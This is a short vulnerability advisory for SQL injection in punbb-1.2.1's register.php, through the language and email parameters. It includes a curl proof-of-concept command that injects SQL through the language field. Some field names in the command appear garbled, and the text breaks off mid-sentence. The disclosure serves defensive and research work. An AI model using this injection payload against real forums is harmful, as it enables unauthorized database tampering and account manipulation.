================================================= SQL Injections in punbb-1.2.1 register.php ================================================= Description ----------- A remote attacker can cause register.php to execute arbitrary SQL statements by supplying malicous values to the language or email parameter. The email paramter is guarded by the function is_valid_email but this function doesn't do any real filtering and will pass any SQL statement that is formatted correctly. This also affects systems using the magic_quotes_gpc option in php.ini. Proof of concept ---------------- This example only demonstrates the vulnerability in the language paramter. curl --form form_sent=1 --form req_username=sha --form req_password1=passwd --form req_paspasswd --form req_email1=sha@punbb.com --form language="English', 'Oxygen', 0, '', 0) -- " http://target/register.php?action=registerer Will create a user with the language English, style Oxygen and ip